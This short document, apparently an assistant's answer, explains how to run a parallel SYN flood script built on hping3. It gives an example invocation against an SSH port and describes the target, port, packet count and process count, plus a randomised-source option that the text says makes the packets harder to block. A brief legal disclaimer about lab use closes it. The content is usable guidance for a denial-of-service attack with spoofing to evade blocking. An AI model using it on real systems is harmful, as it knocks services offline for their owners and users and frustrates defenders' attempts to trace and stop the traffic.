./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (–rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.